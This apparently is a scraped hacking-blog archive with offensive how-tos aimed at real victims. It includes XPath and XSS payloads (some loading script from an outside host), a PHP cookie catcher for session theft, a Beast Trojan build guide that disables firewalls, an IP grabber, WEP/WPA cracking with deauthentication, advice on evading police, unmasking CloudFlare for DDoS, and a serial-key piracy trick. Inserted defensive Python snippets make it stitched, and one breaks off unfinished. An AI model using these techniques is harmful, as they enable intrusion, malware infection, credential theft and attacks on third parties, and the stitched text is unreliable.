Showing posts with label hacking. Show all posts

Sunday, 3 May 2015

HOW TO FIND SERIAL KEYS FROM GOOGLE

Steps:
1) Go to google.com.
2) Type the name of the software you want a key for, and add 94FBR at the end.

Eg: if you want to find a key for IDM, write " IDM 94FBR " (without quotes).

3) Search, and you will find many sites listing serial keys for that software.


XPATH INJECTION TUTORIAL


XPath is a language that has been designed and developed to operate on data that is described with XML. The XPath injection allows an attacker to inject XPath elements in a query that uses this language. Some of the possible goals are to bypass authentication or access information in an unauthorized manner.

We are going to learn using a simple example. Download the code from here and put it in your local server directory. (The code was created by Amol Naik.)

Sample XML document which we are going to use:

<Employees>
<!-- Employees Database -->
  <Employee ID="1">
    <FirstName>Johnny</FirstName>
    <LastName>Bravo</LastName>
    <UserName>jbravo</UserName>
    <Password>test123</Password>
    <Type>Admin</Type>
  </Employee>
  <Employee ID="2">
    <FirstName>Mark</FirstName>
    <LastName>Brown</LastName>
    <UserName>mbrown</UserName>
    <Password>demopass</Password>
    <Type>User</Type>
  </Employee>
  <Employee ID="3">
    <FirstName>William</FirstName>
    <LastName>Gates</LastName>
    <UserName>wgates</UserName>
    <Password>MSRocks!</Password>
    <Type>User</Type>
  </Employee>
  <Employee ID="4">
    <FirstName>Chris</FirstName>
    <LastName>Dawes</LastName>
    <UserName>cdawes</UserName>
    <Password>letmein</Password>
    <Type>User</Type>
  </Employee>
</Employees>

Bypass Authentication:

Browse to the login.php page; here we see a simple login form.


If the application does not properly filter such input, the tester will be able to inject XPath code and interfere with the query result. For instance, the tester could input the following values:

Username: ' or '1' = '1
Password:  ' or '1' = '1
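Here is an added example (not the post's or Amol Naik's code) in Python that shows why the input above works: the unsafe function pastes the username and password straight into the XPath expression, so the query structure changes, while the hardened login keeps user input out of the expression entirely and only compares values in code. The document is constructed from the sample XML above; the fixed-path ElementTree lookup is this example's assumption, not the tutorial's login.php.

```python
import hmac
import xml.etree.ElementTree as ET

# Constructed from the post's sample document (two of the four employees).
EMPLOYEES_XML = """<Employees>
  <Employee ID="1"><UserName>jbravo</UserName><Password>test123</Password><Type>Admin</Type></Employee>
  <Employee ID="2"><UserName>mbrown</UserName><Password>demopass</Password><Type>User</Type></Employee>
</Employees>"""
ROOT = ET.fromstring(EMPLOYEES_XML)


def unsafe_query(username, password):
    """The injectable pattern: user input is concatenated into the XPath.
    Returned as a string so the effect of the payload can be inspected;
    an XPath engine would evaluate the resulting 'or' clause as true for
    every Employee, which is the bypass the tutorial demonstrates."""
    return ("//Employee[UserName='%s' and Password='%s']/UserName"
            % (username, password))


def is_injected(username, password):
    """Detection check for the unsafe pattern: the concatenated expression
    should contain exactly the two quoted literals the template had (four
    quote characters); anything else means the input altered the query."""
    return unsafe_query(username, password).count("'") != 4


def safe_login(root, username, password):
    """Hardened lookup: the XPath is a constant ('Employee'); user input is
    only ever compared as data, so quotes and 'or' clauses are inert.
    Returns the account Type on success, None otherwise."""
    for emp in root.findall("Employee"):
        stored_user = emp.findtext("UserName") or ""
        # Plaintext passwords mirror the post's sample document only.
        stored_pass = emp.findtext("Password") or ""
        if hmac.compare_digest(stored_user.encode(), username.encode()) and \
           hmac.compare_digest(stored_pass.encode(), password.encode()):
            return emp.findtext("Type")
    return None
```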



Broken Authentication and Session Management is number 2 in the OWASP Top 10 vulnerability list for 2013. In Mutillidae it contains three subsections:

Authentication Bypass
Privilege Escalation
Username Enumeration

We already covered username enumeration in the last article and got a list of valid usernames that exist in the database. Today we are going to use the authentication bypass methods:

Using cookie
Using brute-force
Using SQL injection

(1) Authentication Bypass Using Cookie:
As we know, Mutillidae is vulnerable to XSS, so we can capture a cookie with the help of XSS. We are going to take advantage of persistent XSS.

http://127.0.0.1/mutillidae/index.php?page=add-to-your-blog.php

The above link is vulnerable to a persistent XSS attack. We can submit HTML in the add-to-blog section, so we are going to use a cookie catcher.

Content of cookie_catcher.php:

<?php
header ("Location: http://192.168.56.1");
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>

Upload your cookie_catcher.php to a server. For the demo I used my local Apache server; after execution of the script it will redirect to 192.168.56.1. You can change the code according to your needs. It will grab the IP, cookie, referer, time and date.



HOW TO FIND REAL I.P. PROTECTED BY CLOUD FLARE?


All these methods are based on bad admin configurations, but such misconfigurations are still quite common.

If you want to find the real IP address of a website which is hidden by CloudFlare: it has come to my attention that many booters, hosts, malicious websites and more use CloudFlare for DDoS protection and anti-abuse-report protection. With CloudFlare protection it is difficult to get the host's IP; therefore it is difficult to send an abuse report or launch a (D)DoS attack. This simple guide will help you obtain the real IP of any website protected by CloudFlare, which can be used for whatever you desire!

METHOD 1:-

If you simply ping the domain, it will give an IP which is not the website's real IP address. You should try the following options to get the real IP address of the domain.

ping direct-connect.domain.com

             OR

ping direct.domain.com

             OR

ping ftp.domain.com

             OR

ping cpanel.domain.com

             OR

ping mail.domain.com

METHOD 2 :-

For a long-aged domain you can use the Netcraft toolbar to check the real IP.

For Example

Code:

http://toolbar.netcraft.com/site_report?url=DOMAIN.COM

Clearly we can see the change in IP to a CloudFlare one.

METHOD 3 :-

You can try brute-forcing DNS; some subdomain will have the real IP of the website.

For this purpose you need the Nmap tool.

Open your terminal with root privilege and type the following command

# nmap -sV -sS -F <target>

It will scan the host and give results; it does not give the real IP of the website (but from this you can tell whether the website is protected by CloudFlare or not).

Now type the following command in the terminal

# nmap --script dns-brute -sn <target>

It will give you the real IP of the website.


I made a simple bash script which does all of this for you. For more details click here.



If all of the above methods do not work, then there is no admin misconfiguration, so you cannot find the real IP.


Monday, 16 June 2014

Hacking rules


Hacking rules:
1. Never damage any system. This will only get you into trouble.
2. Never alter any of the system's files, except for those needed to ensure that you are not detected, and those to ensure that you have access into that computer in the future.
3. Do not share any information about your hacking projects with anyone but those you'd trust with your life.
4. When posting on BBS's (Bulletin Board Systems) be as vague as possible when describing your current hacking projects. BBS's CAN be monitored by law enforcement.
5. Never use anyone's real name or real phone number when posting on a BBS.
6. Never leave your handle on any systems that you hack into.
7. DO NOT hack government computers.
8. Never speak about hacking projects over your home telephone line.
9. Be paranoid. Keep all of your hacking materials in a safe place.
10. To become a real hacker, you have to hack. You can't just sit around reading text files and hanging out on BBS's. This is not what hacking is all about....

Tuesday, 13 May 2014

Basic XSS Cross Site Scripting Demo



A lot of you guys aren't clear on XSS, aka cross-site scripting, and many of you were sending me mails asking how to do an XSS attack, etc. That's why I got this video, which explains some basic concepts of the XSS attack, how it can be practised and how we can use it to hack anybody.

This video is contributed by Brian Contos, CISSP, from a company named Imperva. It takes you through each and every step involved in finding an XSS vulnerability in a web page and showcases some of the basic steps that you need to know.

What is XSS

Cross-site scripting ('XSS' or 'CSS') is an attack that takes advantage of a Web site vulnerability in which the site displays content that includes un-sanitized user-provided data. For example, an attacker might place a hyperlink with an embedded malicious script into an online discussion forum….

The purpose of the malicious script is to attack other forum users who happen to select the hyperlink. For example, it could copy user cookies and then send those cookies to the attacker.


Conclusion

Now you should be clearer about XSS attacks; it is easy and can be used in many ways to hack anybody or anything else, also for fun. Now let's take a look at some of the commonly used XSS scripts and code snippets:

Assuming you can only fit in a few characters and it filters against ".js", you can rename your JavaScript file to an image as an XSS vector:
<SCRIPT SRC="http://pavanjoshi2050.blogspot.in/xss.jpg"></SCRIPT>

This is the simplest snippet used to find an XSS vulnerability in a web page:
<SCRIPT>alert('XSS');</SCRIPT>

This is a normal XSS JavaScript injection, and most likely to get caught, but I suggest trying it first (the quotes are not required in any modern browser, so they are omitted here):
<SCRIPT SRC="http://pavanjoshi2050.blogspot.in/xss.js"></SCRIPT>

There are many more XSS vectors you can use to bypass security, but these are the most useful for finding an XSS vulnerability in a web page.

Monday, 12 May 2014

HOW TO HACK VICTIM PC USING BEAST TROJAN


Only for educational purposes:

NOTE: I'm not responsible for any damage.


=================================
Step 1: Download Beast Trojan (google it) and install it.

Step 2: Unrar the pack.

Step 3: Open the software and you will get the screen.
HOW TO MAKE A TROJAN USING BEAST TROJAN

STEP 1: Now click on the "Build server" button.

Step 2: Now click on the notification tab.

Step 3: In the notifications tab click on the e-mail button.

Step 3: Now fill in your proper email.

Step 4: Now go to the "AV-FW kill" tab.

Step 5: Now put a tick mark on "disable XP firewall".

Step 6: Now click on the "EXE icon" tab.

Step 7: Now you can choose any icon for the file from the list, or you can browse for the icon from a directory and use it.

Step 8: Now click on the "Save Server" button and the Trojan will be made.

Step 9: Now send this Trojan file to the victim.

Step 10: As and when the victim installs the trojan on his system you will get a notification e-mail on the e-mail id you specified while making the trojan. This email consists of the IP address and port of the victim.

Step 11: Now put his IP address in the "host" column and put his port in the "port" column.

Step 12: After that click on the "Go Beast" button and you will be connected to the victim's PC.

Step 13: Now select the action or task you want to execute on the victim's PC from the given list.

Step 14: Now to destroy or kill the trojan click on the "server" tab from the menu.

Step 15: Now click on the "Kill Server" button and the trojan will be destroyed from the victim's PC.

Then you are done.

How to grab someone's IP address?



1) Copy the code below into Notepad and save it as Grab.php (.php is a must).
2)
<?php
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$img_number = imagecreate(400,95);
$backcolor = imagecolorallocate($img_number,10,102,153);
$textcolor = imagecolorallocate($img_number,255,255,255);
imagefill($img_number,0,0,$backcolor);
$number0 = " This is Your IP/Proxy";
$number1 = " IP: $_SERVER[HTTP_X_FORWARDED_FOR]";
$number2 = " Host/Proxy: $hostname";
$number4 = " _________________________________";
Imagestring($img_number,10,5,5,$number0,$textcolor);
Imagestring($img_number,10,5,25,$number1,$textcolor);
Imagestring($img_number,10,5,45,$number2,$textcolor);
Imagestring($img_number,10,5,50,$number4,$textcolor);
Imagestring($img_number,10,8,50,$number4,$textcolor);
Imagestring($img_number,10,5,10,$number4,$textcolor);
Imagestring($img_number,10,8,10,$number4,$textcolor);
header("Content-type: image/png");
imagepng($img_number);
$file=fopen("Name-here-to-protect-the-File.txt","a");
$file2 = "- IP joined - IP/Proxy: $_SERVER[HTTP_X_FORWARDED_FOR] - Host: $hostname - '\n' ";
fwrite($file, $file2);
fclose($file);
?>
3) Now make a free account on any of the free web hosting sites, Ripway.com or My3gb.

4) Now upload Grab.php to your web hosting site.

5) Copy the link of your uploaded file and send it to the victim.

6) As soon as the victim clicks on your link his IP will be saved on your free web hosting site.

7) Enjoy, you are done, and share with your friends.

NOTE: Never use any of these tricks for something evil; always love what you do and do it legally.

How to Crack wifi network’s password:-




Hello and welcome to my tutorial about wireless networking.

Today I'll be teaching you how easy it is to obtain access to a protected wireless network by cracking the Wi-Fi network's password.

There are lots of questions coming from beginners on how to get a WEP/WPA/WPA2 password and access a neighbour's Wi-Fi connection.

We should all be aware of the fact that WEP encryption is easy to crack, while WPA and WPA2 are comparatively difficult and need a handshake and a dictionary.

Here, we will be covering all of the aspects and ways of hacking a Wi-Fi network using BackTrack and gaining access to the router.
==>>How to Crack WEP password
What you need to succeed:

A compatible wireless adapter: this is the biggest requirement to hack any Wi-Fi network. You'll need a wireless adapter that's capable of packet injection, and chances are the one in your computer is not.

A BackTrack CD: download yourself a copy of the BackTrack CD and burn it, or load it up in VMware to get started.
A nearby WEP-enabled Wi-Fi network. The WEP signal should be strong and ideally people are using it, connecting and disconnecting their devices from it.

Okay, so let's begin. First we need to open a terminal in BackTrack. To do that, just click the little icon that's on the right side of System. Please see the image below:
STEP 1:

Type the command airmon-ng.

This command displays our interfaces. In my case I have wlan0, and now we are going to put it into monitor mode.
STEP 2:

Type airmon-ng start wlan0.

As you can see in the picture below, it says (monitor mode enabled on mon0), and we are going to be using mon0 instead of wlan0 as our interface.
STEP 3:

Type airodump-ng mon0 and that will start scanning for Wi-Fi networks. As you can see, there is a network called SKIDHACKER. Take a note of the BSSID, the DATA, the CHANNEL and the type of ENCRYPTION. Please refer to the image below if you have any trouble getting to that point.

STEP 4:

Now we are going to lock on to a specific Wi-Fi network, named SKIDHACKER. To do that, type airodump-ng -c (channel) -w WEPcrack --bssid (bssid of the network) mon0. Replace (channel) with the channel of the victim's network, and replace (bssid of the network) with the BSSID of the victim's network.

Okay, so as you can probably see, the data is going really slowly, and we need to boost that up. We are going to need a lot more data, so let's perform one of the aireplay commands that will boost that data.
STEP 5:

First, open up a new terminal and type aireplay-ng -1 0 -a (bssid) mon0, where (bssid) is the BSSID of the network. Now if your Wi-Fi card is supported, you should see "Association successful"; if you don't see that, then your card is not supported.
Step 6:

Now we are going to type in aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) mon0. When the question "Use this packet ?" pops up, just push the letter y. As you can see in the image below, the data count went up drastically.
STEP 7:

Okay, so now let's open a new terminal and we are going to attempt to crack it with the amount of data we have. I recommend getting over 20000 data packets before trying. So let's type aircrack-ng WEPcrack*.cap. Replace WEPcrack with the filename you chose before when capturing the data, and don't forget to add that asterisk after the filename and the extension, which is .cap.

STEP 8:

Now it will attempt to get the password. Just wait a couple of minutes for it to complete, and once it is done it will say KEY FOUND! [ XX:XX:XX:XX:XX ] where the X's will be random numbers and/or letters. That's not it; to connect you will need to remove the colons. For example, if we were to have 12:34:52:66:59, the password would be 1232526659.

Just log in to your Windows OS, and connect using that password.

==========================================

==========================================
==>>How to Crack WPA/WPA2 Password

So lets begin. What you will need for this crack is a dictionary file that we are going to use to get the WPA/WPA2 password.

Remember, the bigger the dictionary file is the greater the chance you have in cracking the password.

So now you are probably wondering, where do I get a dictionary file? Well, I don't know if this is allowed or not, but I recently downloaded a 1.9GB dictionary file. You can google for it.
STEP 1:

Okay, so firstly open up a terminal and once we have the terminal open we are going to type in airmon-ng which will display our wireless interfaces.

In my case I have wlan0, and now we are going to put it into monitor mode.

STEP 2:

Type airmon-ng start wlan0. As you can see in the picture below, it says (monitor mode enabled on mon0), and we are going to be using mon0 instead of wlan0 as our interface.
STEP 3:

Let's type in airodump-ng mon0; this command is going to initiate the scanning process for Wi-Fi networks. As you can see in the picture below, a few WPA-encrypted networks should pop up. I'm going to attempt to crack the network under the BSSID SKIDH?CKER. Take a note of the channel, and copy the BSSID for later use.
STEP 4:

Now type airodump-ng -c (channel) -w (filename) --bssid (bssid) mon0, and replace the values to fit what you got from the last step. Don't forget to remember what filename you chose, because we are going to need that at the end.
What is needed to get the WPA or WPA2 key is something called a WPA Handshake. You can obtain a handshake by kicking someone off the network, and those computers will automatically reconnect which will give you the handshake.

This means, if there is no one on the network, you can’t get a handshake, and you can’t crack the security of WPA network.
STEP 5:

So how do we know if someone is connected? Well, look at the lower part of the airodump output, and you will notice something called STATION; underneath that, if someone is connected, it will show you their MAC address.

Once you get a handshake, airodump will alert you in the top screen, and the handshake will be located right from the time stamp.
STEP 6:

Okay, so let's open up a new terminal and we are going to kick off the computers that are connected. Let's type in aireplay-ng -1 0 -a (bssid) mon0. Replace bssid with the network you are trying to crack and hit enter. It is going to attempt to kick off a client, and if it succeeds you will see the WPA handshake at the top right corner; if you don't, run the aireplay command a couple of times.

So now that we have a wpa handshake file, we are going to attempt to crack it.
STEP 7:

Let's stop the scan by pressing CONTROL + C in the terminal where airodump is running. Now in order to find the handshake file, you need to go to the top menu and choose Places > Home Folder. Okay, so let's open up a terminal and we are going to type in aircrack-ng -w (dictionary) /root/(filename), where filename is the filename you specified when capturing the WPA handshake and dictionary is the path of the wordlist you downloaded.
STEP 8:

This can be done by dragging the handshake file into the terminal after the aircrack-ng -w (dictionary) command and it will paste in its path. All you need to do is hit enter. The password needs to be in the dictionary file, so the bigger the wordlist is, the bigger the chances of getting the password.

If the password is in the wordlist, it will give you a success message and the key in brackets.
Happy hacking..!

commands

=>> airmon-ng
This backtrack command displays the wireless interfaces.

=>> airmon-ng start wlan0
This command starts monitoring mode on a wi-fi device.

=>> airodump-ng mon0
This command shows all of the wi-fi networks online.

=>> airodump-ng -c (channel) -w (filename) --bssid (bssid) mon0
This command specifies the wi-fi device to concentrate to one network.

=>> aireplay-ng -1 0 -a (bssid) mon0
This command kicks off clients that are connected, and gets the handshake.

=>> aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) mon0
This command boosts the data, when cracking WEP.

=>> aircrack-ng -w (dictionary) (wpa handshake)
This command is used when cracking WPA or WPA2 networks.

=>> aircrack-ng (filename)*.cap
This command is used when cracking WEP networks.


the history of hacking (must read)




Hacking has been around for more than a century. In the 1870s, several teenagers were flung off the country's brand new phone system by enraged authorities. Here's a peek at how busy hackers have been in the past 35 years.





Early 1960s

University facilities with huge mainframe computers, like MIT's artificial intelligence lab, become staging grounds for hackers. At first, "hacker" was a positive term for a person with a mastery of computers who could push programs beyond what they were designed to do.

Early 1970s

John Draper makes a long-distance call for free by blowing a precise tone into a telephone that tells the phone system to open a line. Draper discovered the whistle as a give-away in a box of children's cereal. Draper, who later earns the handle "Captain Crunch," is arrested repeatedly for phone tampering throughout the 1970s.

Yippie social movement starts YIPL/TAP (Youth International Party Line/Technical Assistance Program) magazine to help phone hackers (called "phreaks") make free long-distance calls.

Two members of California's Homebrew Computer Club begin making "blue boxes," devices used to hack into the phone system. The members, who adopt handles "Berkeley Blue" (Steve Jobs) and "Oak Toebark" (Steve Wozniak), later go on to found Apple Computer.

Early 1980s

Author William Gibson coins the term "cyberspace" in a science fiction novel called Neuromancer.

In one of the first arrests of hackers, the FBI busts the Milwaukee-based 414s (named after the local area code) after members are accused of 60 computer break-ins ranging from Memorial Sloan-Kettering Cancer Center to Los Alamos National Laboratory.

Comprehensive Crime Control Act gives Secret Service jurisdiction over credit card and computer fraud.

Two hacker groups form, the Legion of Doom in the United States and the Chaos Computer Club in Germany.

2600: The Hacker Quarterly is founded to share tips on phone and computer hacking.

Late 1980s

The Computer Fraud and Abuse Act gives more clout to federal authorities.

Computer Emergency Response Team is formed by U.S. defense agencies. Based at Carnegie Mellon University in Pittsburgh, its mission is to investigate the growing volume of attacks on computer networks.

At 25, veteran hacker Kevin Mitnick secretly monitors the e-mail of MCI and Digital Equipment security officials. He is convicted of damaging computers and stealing software and is sentenced to one year in prison.

First National Bank of Chicago is the victim of a $70-million computer heist.

An Indiana hacker known as "Fry Guy" -- so named for hacking McDonald's -- is raided by law enforcement. A similar sweep occurs in Atlanta for Legion of Doom hackers known by the handles "Prophet," "Leftist" and "Urvile."

Early 1990s

After AT&T long-distance service crashes on Martin Luther King Jr. Day, law enforcement starts a national crackdown on hackers. The feds nab St. Louis' "Knight Lightning" and in New York grab Masters of Deception trio "Phiber Optik," " Acid Phreak" and "Scorpion." Fellow hacker "Eric Bloodaxe" is picked up in Austin, Texas.

Operation Sundevil, a special team of Secret Service agents and members of Arizona's organized crime unit, conducts raids in 12 major cities, including Miami.

A 17-month search ends in the capture of hacker Kevin Lee Poulsen ("Dark Dante"), who is indicted for stealing military documents.

Hackers break into Griffith Air Force Base, then penetrate computers at NASA and the Korean Atomic Research Institute. Scotland Yard nabs "Data Stream," a 16-year-old British teenager who curls up in the fetal position when seized.

A Texas A&M professor receives death threats after a hacker logs on to his computer from off-campus and sends 20,000 racist e-mail messages using his Internet address.

In a highly publicized case, Kevin Mitnick is arrested (again), this time in Raleigh, N.C., after he is tracked down via computer by Tsutomu Shimomura at the San Diego Supercomputer Center.

Late 1990s

Hackers break into and deface federal Web sites, including the U.S. Department of Justice, U.S. Air Force, CIA, NASA and others.

Report by the General Accounting Office finds Defense Department computers sustained 250,000 attacks by hackers in 1995 alone.

A Canadian hacker group called the Brotherhood, angry at hackers being falsely accused of electronically stalking a Canadian family, break into the Canadian Broadcasting Corp. Web site and leave message: "The media are liars." Family's own 15-year-old son eventually is identified as stalking culprit.

Hackers pierce security in Microsoft's NT operating system to illustrate its weaknesses.

Popular Internet search engine Yahoo! is hit by hackers claiming a "logic bomb" will go off in the PCs of Yahoo!'s users on Christmas Day 1997 unless Kevin Mitnick is released from prison. "There is no virus," Yahoo! spokeswoman Diane Hunt said.

1998

Anti-hacker ad runs during Super Bowl XXXII. The Network Associates ad, costing $1.3-million for 30 seconds, shows two Russian missile silo crewmen worrying that a computer order to launch missiles may have come from a hacker. They decide to blow up the world anyway.

In January, the federal Bureau of Labor Statistics is inundated for days with hundreds of thousands of fake information requests, a hacker attack called "spamming."

Hackers break into United Nation's Children Fund Web site, threatening a "holocaust" if Kevin Mitnick is not freed.

Hackers claim to have broken into a Pentagon network and stolen software for a military satellite system. They threaten to sell the software to terrorists.

The U.S. Justice Department unveils National Infrastructure Protection Center, which is given a mission to protect the nation's telecommunications, technology and transportation systems from hackers.

Hacker group L0pht, in testimony before Congress, warns it could shut down nationwide access to the Internet in less than 30 minutes. The group urges stronger security measures.

Friday, 9 May 2014

Top 3 Proxy Issues That No One Ever Told You (must read)




Occasionally I used to get asked to look at web application architecture for companies. Companies that grow above a certain size or threat level often move to using inline caching proxies, inline cloud based WAF solutions (e.g. CloudFlare or Incapsula), or both. For a long time I’ve had a hard time explaining why this could be a problem but I finally ran into a confluence of problems that demonstrate why this is an issue. Let’s start with the major problem.

X-Forwarded-For

When you have a website that needs to use IP addresses, you’ll run into strange situations if you run an inline proxy. The most important issue is that the IP address of the machine connecting to your web server is always that of the upstream proxy/ies and not that of the person connecting. The user connects to the proxy and the proxy connects to your website; therefore, your website always sees the same IP address. IP addresses are used for all kinds of security measures. They’re used for seeding secret strings in cookies in PHP. They’re used for doing flood detection. They’re used for brute force detection and lockouts. IPs are used all the time. But what happens when all the IPs look the same?
To get around that, proxies have invented something called the X-Forwarded-For header, which can look like a lot of random things. It can look like any of the following:
X-Forwarded-For: 192.168.0.5
X-Forwarded-For: 192.168.1.2, 123.123.123.123
X-Forwarded-For: 1.3.3.7
X-Forwarded-For: localhost, 123.123.123.123
Because it's an optional header it contains random things. Sometimes those things are real IP addresses (sometimes internal RFC1918 address space and sometimes public) and sometimes it just contains garbage. Either way, most proxies have decided that the X-Forwarded-For header is the best header to use to tack on their information. So they tack the IP address of the user who is connecting to them onto the end of the string that they receive (or create a new string if there isn't one already) and pass that to the web server.
The web-server then has to be smart enough to take that information and parse apart the string to grab the last IP address and intelligently replace the IP address of the proxy with the IP address listed in the X-Forwarded-For header. Inline devices that sit behind the proxy have to be just as smart. This leads to all kinds of weird scenarios where an attacker can spoof IP addresses by sending X-Headers after having breached the network, but that is less likely.

rpaf

To accomplish this goal of looking at the X-Forwarded-For header, many people turn to rpaf, which performs this task very easily. The problem is that if rpaf doesn’t see the header it doesn’t know what IP address to use, and it will instead default to nothing. So how do we get the inline proxy to send something that rpaf won’t understand? Simple: we use a null byte (here shown as %00 below so you can visualize it, but normally it is not URL encoded):
GET / HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
X-Forwarded-For%00: whatever
This will create a 400 error, because Apache doesn’t understand the request. However, the most important thing is what it looks like in the logs. Notice that in the first log file there is an IP address, and in the second there’s no IP address:
Mar 17 20:05:46 123.123.123.123 – - [17/Mar/2013:20:05:46 +0000] “GET / HTTP/1.1″ 200 15 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0″
Mar 17 20:06:10 – - – [17/Mar/2013:20:06:10 +0000] “GET / HTTP/1.1″ 400 56 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0″
An attacker's mileage may vary depending on how the proxy treats the header with a null byte in it. Still, the proxy may do its own logging, which may render this attack useless. The most dangerous variant would be if an attacker can simply bypass the cloud based WAF solution and go directly to the origin server. By bypassing the WAF the attacker doesn't have to worry about how the proxy handles the null byte or any extra logging it may perform.
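As an added example (not from the original post or from rpaf), here is a Python function that attributes a request to an IP the way the post says the web server has to: take the right-most address in X-Forwarded-For that is not one of our own hops, ignore the header entirely when the request did not arrive through our proxy (the direct-to-origin case), and fall back to the socket address rather than to nothing when the header is missing or its name is mangled with a null byte (the rpaf failure). The trusted-proxy address and the sample header values are constructed.

```python
import ipaddress

# Assumed deployment: the inline proxy/WAF hop as the origin's socket sees it.
# Anything else that connects directly is treated as the client itself.
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.2")}


def _to_ip(token):
    """Return an ip_address for one header token, or None if it is not one."""
    token = token.strip()
    if not token or any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in token):
        return None  # control bytes (NUL included) are never an address
    try:
        return ipaddress.ip_address(token)
    except ValueError:
        return None  # "localhost", "whatever", hostnames: garbage for our purposes


def client_ip(remote_addr, headers):
    """Attribute a request to an IP, never to 'nothing'.

    remote_addr: peer address from the TCP socket (always present)
    headers:     mapping of raw header name -> value, exactly as received
    Returns (ip, source) with source 'xff' or 'socket', so the log line
    records both the address and how much it can be trusted.
    """
    peer = ipaddress.ip_address(remote_addr)
    # A client that reached the origin directly did not pass through our
    # proxy, so whatever it put in X-Forwarded-For is attacker-controlled.
    if peer not in TRUSTED_PROXIES:
        return str(peer), "socket"

    # Exact-name match: 'X-Forwarded-For\x00' is a different header name and
    # falls through to the socket address below instead of to an empty field.
    xff = None
    for name, value in headers.items():
        if name.lower() == "x-forwarded-for":
            xff = value
            break

    if xff is not None:
        # Walk from the right: the last hop appended the address it saw.
        # Skip our own proxies so we land on the first hop we did not control.
        for token in reversed(xff.split(",")):
            ip = _to_ip(token)
            if ip is None:
                break  # garbage in the chain: trust nothing to the left of it
            if ip not in TRUSTED_PROXIES:
                return str(ip), "xff"
    return str(peer), "socket"
```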

400 errors

Why would an attacker intentionally want to send a request that creates a 400 error? There are lots of potential reasons. A few of the fine folks on Twitter suggested the following:
  • Fingerprinting the operating system
  • Filling up the logs
  • Using the user-agent to seed the system logs with a remote file include
  • Using the user-agent to seed the system to create XSS attacks in log parsers
  • Distraction from another attack
There may be many additional reasons that a request that creates a 400 error may be useful, but the point is that as a result there’s no IP address associated with the request in the logs in Apache.

Obfuscation

Sometimes proxies may communicate very sensitive information to the server, so that the server knows that it’s talking to the right thing. These secrets can be just about anything. Let’s say for instance that knowing that secret would allow you to contact the server directly and it would believe you are the proxy. Then let’s say the proxy and the web server decide to use another X header instead of X-Forwarded-For to obfuscate it so that an attacker may not know what the real header is – then the attacker will be unable to spoof another IP address.
Here is where TRACE comes back to haunt us. The HTTP method TRACE comes back once every few years to cause problems, and for some reason it’s still enabled by default more times than not. With TRACE an attacker can see what they sent to the server. But because they are not connecting directly to the server but instead to the proxy, what the attacker really sees is what the proxy is sending to the web server. Here’s what it might look like:
TRACE / HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate

HTTP/1.1 200 OK
Date: Sat, 16 Mar 2013 22:05:22 GMT
Server: Apache
Content-Type: message/http
X-Secret-info: lkjfalkjsfoij2oif4oijalskdfjsecretstringgoeshere12342134
Obfuscated-Client-Ip: 123.123.123.123
Content-Length: 348
So, with very little effort, the attacker now knows both the secret and the obfuscated header that the web server uses in place of the client IP address. If the web server accepts inbound connections from the Internet and its real IP address can be discovered, the attacker can talk to it directly while appearing to come from any IP address they choose. This is not an ideal scenario. At an absolute minimum, disabling TRACE is an important and easy step to take. Beyond that, forensic logging that does not rely on rpaf or other tricks to derive the client IP address from alternate HTTP headers is also a good idea.
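The points made above, 400 errors that leave no usable client address, null bytes in X-Forwarded-For, TRACE requests, and headers arriving on a connection that never went through the proxy, can all be checked from the access log if the log records the real TCP peer separately from the header. The script below is an added example and is not from the original post. It assumes the Apache LogFormat shown in its first comment, which logs both %a (the connection peer; it assumes rpaf or mod_remoteip is not rewriting that address, and on Apache 2.4 %{c}a can be used to get the underlying connection peer regardless) and the raw X-Forwarded-For header; the trusted proxy range 203.0.113.0/24 and the sample log lines are constructed for the example.

```python
import ipaddress
import re

# Assumed Apache LogFormat that this parser expects (added example, not the post's own config):
#   LogFormat "%a \"%{X-Forwarded-For}i\" %t \"%r\" %>s %b \"%{User-Agent}i\"" proxied
# %a is the TCP peer address, so it is still present when a request is rejected
# with a 400 before its headers are processed, and a spoofed X-Forwarded-For
# value cannot overwrite it.
LOG_RE = re.compile(
    r'^(?P<peer>\S+) "(?P<xff>[^"]*)" \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<bytes>\S+) "(?P<ua>[^"]*)"$'
)

# Constructed: the egress range of the cloud proxy/WAF that is allowed to set
# X-Forwarded-For. Any other peer presenting the header reached the origin
# directly, so the header must not be trusted for that request.
TRUSTED_PROXIES = [ipaddress.ip_network("203.0.113.0/24")]

# Apache writes control characters into the log as \xHH escapes, so a NUL byte
# in the header shows up as the four characters \x00.
ESCAPED_CONTROL = re.compile(r"\\x[0-9a-fA-F]{2}")

# Constructed sample log lines in the format above.
SAMPLE_LOG = [
    '203.0.113.10 "198.51.100.7" [16/Mar/2013:22:05:22 +0000] "GET / HTTP/1.1" 200 1234 "Mozilla/5.0"',
    '192.0.2.55 "198.51.100.7" [16/Mar/2013:22:05:23 +0000] "GET /admin HTTP/1.1" 200 512 "Mozilla/5.0"',
    '203.0.113.10 "198.51.100.7\\x00" [16/Mar/2013:22:05:24 +0000] "GET / HTTP/1.1" 200 1234 "Mozilla/5.0"',
    '203.0.113.10 "-" [16/Mar/2013:22:05:25 +0000] "GET / HTTP/1.1" 400 - "-"',
    '203.0.113.10 "198.51.100.7" [16/Mar/2013:22:05:26 +0000] "TRACE / HTTP/1.1" 405 - "curl/7.29.0"',
]


def parse_line(line):
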